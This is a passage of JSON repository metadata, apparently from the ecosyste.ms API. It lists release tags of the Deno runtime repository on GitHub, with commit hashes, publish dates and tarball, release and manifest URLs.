//codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.